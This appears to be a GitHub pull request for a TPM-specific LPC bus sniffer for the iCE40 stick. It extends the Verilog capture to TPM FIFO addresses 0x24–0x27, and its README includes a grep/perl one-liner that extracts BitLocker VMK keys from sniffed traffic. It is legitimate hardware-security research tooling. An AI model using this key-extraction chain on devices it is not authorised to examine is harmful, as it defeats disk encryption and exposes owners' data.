### PR TITLE
TPM compatiblity and state machine improvements

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -45,6 +45,9 @@ clean:
 test: buffer.vvp mem2serial.vvp ringbuffer.vvp uart_tx_tb.vvp top_tb.vpp test/helloonechar_tb.vvp test/helloworld_tb.vvp
 
 install: top.bin
-	iceprog top.bin
+	iceprog lpc_sniffer.bin
+	
+prog: top.bin
+	iceprog lpc_sniffer.bin
 
 .PHONY: install

--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # TPM Specific lpc sniffer (low pin count) for ice40 stick
 
-Turn the ice40 stick into a LPC sniffer, only logging TPM specific messages. This repository is a duplicate of [https://github.com/lynxis/lpc_sniffer/](https://github.com/lynxis/lpc_sniffer/), with modifications made to only log messages with start field `0101` and address `24`.
+Turn the ice40 stick into a LPC sniffer, only logging TPM specific messages. This repository is a duplicate of [https://github.com/lynxis/lpc_sniffer/](https://github.com/lynxis/lpc_sniffer/), with modifications made to only log messages with start field `0101` and address between `24` and `27`.
 
 This project was used to extract BitLocker VMK keys by sniffing the LPC bus when BitLocker was enabled in it's default configuration. More information is available [in this post](https://pulsesecurity.co.nz/articles/TPM-sniffing).
 
@@ -13,9 +13,11 @@ This project was used to extract BitLocker VMK keys by sniffing the LPC bus when
 # How to use
 
 1. modify EEPROM of the FTDI and enable OPTO mode on Channel B
-1. programm top.bin into your ice40 by `iceprog lpc_sniffer.bin`
+1. program lpc_sniffer.bin into your ice40 by `iceprog lpc_sniffer.bin`
+1. note: previous command can be replace by `make install`
 1. connect the LPC bus
-1. python3 `./parse/read_serial.py /dev/ttyUSB1`
+1. extract LPC data: python3 `./parse/read_serial.py /dev/ttyUSB1` | tee outlog
+1. extract key from data: cut -f 2 -d\' outlog | grep '2...00$' | perl -pe 's/.{8}(..)..\n/$1/' | grep -Po "2c0000000100000003200000(..){32}"
 
 # what connectors are used on the IceStick?
 

--- a/lpc.v
+++ b/lpc.v
@@ -5,140 +5,181 @@
 	* lpc_reset: reset line. active low
  * output signals:
 	* out_cyctype_dir: type and direction. same as in LPC Spec 1.1
-        * out_addr: 16-bit address
-        * out_data: data read or written (1byte)
+	* out_addr: 32-bit address (16 would be enough)
+	* out_data: data read or written (1byte)
 	* out_clock_enable: on rising edge all data must read.
  */
 
 module lpc(
-	input [3:0] lpc_ad,
-	input lpc_clock,
-	input lpc_frame,
-	input lpc_reset,
-	input reset,
-	output [3:0] out_cyctype_dir,
-	output [31:0] out_addr,
-	output [7:0] out_data,
-	output out_sync_timeout,
+	input wire [3:0] lpc_ad,
+	input wire lpc_clock,
+	input wire lpc_frame,
+	input wire lpc_reset,
+	input wire reset,
+	output wire [3:0] out_cyctype_dir,
+	output wire [31:0] out_addr,
+	output wire [7:0] out_data,
+	output reg out_sync_timeout,
 	output reg out_clock_enable);
 
-	/* type and direction. same as in LPC Spec 1.1 */
+	/* state machine */	
+	localparam[4:0] STATE_IDLE = 4'd0;
+	localparam[4:0] STATE_START = 4'd1;
+	localparam[4:0] STATE_CYCLE_DIR = 4'd2;
+	localparam[4:0] STATE_ADDRESS_CLK1 = 4'd3;
+	localparam[4:0] STATE_ADDRESS_CLK2 = 4'd4;
+	localparam[4:0] STATE_ADDRESS_CLK3 = 4'd5;
+	localparam[4:0] STATE_ADDRESS_CLK4 = 4'd6;
+	localparam[4:0] STATE_TAR_CLK1 = 4'd7;
+	localparam[4:0] STATE_TAR_CLK2 = 4'd8;
+	localparam[4:0] STATE_SYNC = 4'd9;
+	localparam[4:0] STATE_READ_DATA_CLK1 = 4'd10;
+	localparam[4:0] STATE_READ_DATA_CLK2 = 4'd11;
+	localparam[4:0] STATE_ABORT = 4'd12;
+	localparam[4:0] STATE_TAREND_CLK1 = 4'd13;
+	localparam[4:0] STATE_TAREND_CLK2 = 4'd14;
+	reg [3:0] state = STATE_IDLE;
 
-	/* addr + data written or read */
+	// registers
+	reg [3:0] cyctype_dir;				// mode & direction, same as in LPC Spec 1.1
+	reg [31:0] addr = 32'd0;			// 32 bit address
+	reg [7:0] data;				// 8 bit data
 
-	/* state machine */
-	reg [3:0] state = 0;
-	localparam idle = 0, start = 1, cycle_dir = 2, address = 3, tar = 4, sync = 5, read_data = 6, abort = 7;
-
-	/* counter used by some states */
-	reg [3:0] counter;
-
-	/* mode + direction. same as in LPC Spec 1.1 */
-	reg [3:0] cyctype_dir;
-
-	reg [31:0] addr;
-	reg [7:0] data;
-
-	always @(posedge lpc_clock or negedge lpc_reset) begin
-		if (~lpc_reset) begin
-			state <= idle;
-			counter <= 1;
-		end
-		else begin
-			if (~lpc_frame) begin
-				counter <= 1;
-
-				if (lpc_ad == 4'b0101) /* start condition */
-					state <= cycle_dir;
-				else
-					state <= idle; /* abort */
-            end else begin
-                counter <= counter - 1;
-
-                case (state)
-                cycle_dir:
-                    cyctype_dir <= lpc_ad;
-
-                address: begin
-                    addr[31:4] <= addr[27:0];
-                    addr[3:0] <= lpc_ad;
-                end
-
-                read_data: begin
-                    data[7:4] <= lpc_ad;
-                    data[3:0] <= data[7:4];
-                end
-
-		sync: begin
-			if (lpc_ad == 4'b0000)
-				if (cyctype_dir[3] == 0) begin /* i/o or memory */
-					state <= read_data;
-					data <= 0;
-					counter <= 2;
-				end else
-					state <= idle; /* unsupported dma or reserved */
-			end
-
-                default:
-                    begin end
-                endcase
-				if (counter == 1) begin
-					case (state)
-					idle: begin end
-
-					cycle_dir: begin
-						out_clock_enable <= 0;
-						out_sync_timeout <= 0;
-
-						if (lpc_ad[3:2] == 2'b00) begin /* i/o */
-							state <= address;
-							counter <= 4;
-							addr <= 0;
-						end
-						else /* Don't care about anything other than I/O */
-							state <= idle;
-					end
-
-					address: begin
-						if (cyctype_dir[1]) /* write memory or i/o */
-                                                        state <= read_data;
-						else /* read memory or i/o */
-							state <= tar;
-                                                counter <= 2;
-					end
-
-					tar: begin
-						state <= sync;
-						counter <= 1;
-					end
-
-					sync: begin
-						if (lpc_ad == 4'b1111) begin
-                                                        if (addr == 32'h24) begin 
-                                                            out_sync_timeout <= 1;
-                                                            out_clock_enable <= 1;
-                                                        end
-
-							state <= idle;
-						end
-					end
-
-					read_data: begin
-                                                if (addr == 32'h24)
-                                                    out_clock_enable <= 1;
-						state <= idle;
-					end
-
-					/* todo: missing TAR after read_data */
-
-					abort: counter <= 2;
-					endcase
-				end
-			end
-		end
-	end
-
+	// combinatorial logic
 	assign out_cyctype_dir = cyctype_dir;
 	assign out_data = data;
 	assign out_addr = addr;
+	
+	// synchronous logic
+	// Clock goes high, or RESET goes low (active low reset)
+	always @(negedge lpc_clock  or negedge lpc_reset)
+	begin
+		if (~lpc_reset)
+		begin
+			state <= STATE_IDLE;
+		end else
+		begin
+			// Start condition is having LPC_FRAME low and LAD = 0101 for TPM reads
+			if (~lpc_frame && lpc_ad == 4'b0101)
+			begin
+				out_clock_enable <= 1'b0;
+				out_sync_timeout <= 1'b0;
+				state <= STATE_CYCLE_DIR;
+			end
+			
+			// If LPC_FRAME is high, then we have data
+			if (lpc_frame)			
+			begin
+				// State machine for frame
+				case (state)
+					STATE_CYCLE_DIR:
+					begin
+						// cyctype_dir[3:0] <= lpc_ad[3:0];
+						cyctype_dir <= lpc_ad;
+						
+						if (cyctype_dir[3:2] == 2'b00) // I/O
+						begin
+							if (cyctype_dir[1] == 1'd0) // Read
+							begin
+								state <= STATE_ADDRESS_CLK1;
+							end else // Write
+							begin
+								state <= STATE_IDLE;
+							end
+						end else 
+						begin
+							state <= STATE_IDLE; // unsupported DMA or reserved
+						end
+					   
+					end
+
+					STATE_ADDRESS_CLK1:
+					begin
+						addr[15:12] <= lpc_ad;
+						state <= STATE_ADDRESS_CLK2;
+					end
+
+					STATE_ADDRESS_CLK2:
+					begin
+						addr[11:8] <= lpc_ad;
+						state <= STATE_ADDRESS_CLK3;
+					end
+
+					STATE_ADDRESS_CLK3:
+					begin
+						addr[7:4] <= lpc_ad;
+						state <= STATE_ADDRESS_CLK4;
+					end
+
+					STATE_ADDRESS_CLK4:
+					begin
+						addr[3:0] <= lpc_ad;
+						state <= STATE_TAR_CLK1;
+					end
+
+
+
+					STATE_TAR_CLK1:
+					begin
+						// On first clock LAD are 1111, on second clock it goes Z
+						if (lpc_ad == 4'b1111)
+						begin
+							// Most TPM are using address 24 only, but some (ST, infineon) use 24 to 27 for FIFO
+							if (addr >= 32'h24 && addr <= 32'h27)
+							begin 
+								state <= STATE_TAR_CLK2;
+							end else 
+							begin
+								state <= STATE_IDLE;
+							end
+						   
+						end
+					end
+							
+					STATE_TAR_CLK2:
+					begin
+						state <= STATE_SYNC;
+					end
+					
+					
+
+					STATE_SYNC:
+					begin
+						// Ready when LAD is 0000
+						if (lpc_ad == 4'b0000)
+						begin
+						   state <= STATE_READ_DATA_CLK1;
+						end
+					end
+
+					STATE_READ_DATA_CLK1:
+					begin
+						data[3:0] <= lpc_ad;
+						state <= STATE_READ_DATA_CLK2;
+					end
+					
+					STATE_READ_DATA_CLK2:
+					begin
+						data[7:4] <= lpc_ad;
+						state <= STATE_TAREND_CLK1;
+					end
+
+
+
+					STATE_TAREND_CLK1:
+					begin
+						state <= STATE_TAREND_CLK2;
+					end
+					STATE_TAREND_CLK2:
+					begin
+						// No need to check for addr, it was already filtered on first TAR
+						out_clock_enable <= 1;
+						state <= STATE_IDLE;
+					end
+					
+				endcase
+			end
+		end
+	end
 endmodule
+


### PR DESCRIPTION
This changes fixes issues with some TPM:
https://github.com/denandz/lpc_sniffer_tpm/issues/2
https://github.com/denandz/lpc_sniffer_tpm/issues/3

It has been tested with a TPM that were working before (AT97SC3205 from Dell Optiplex 745) and 2 TPM that were not working before: STM N18FPVMT found in Dell Optiplex 980 and a SLB9635B found in SuperMicro motherboard.

The main changes is logging of message going from address 24 to 27. I've also done a rewrite of the state machine to comply with LPC/TPM protocol.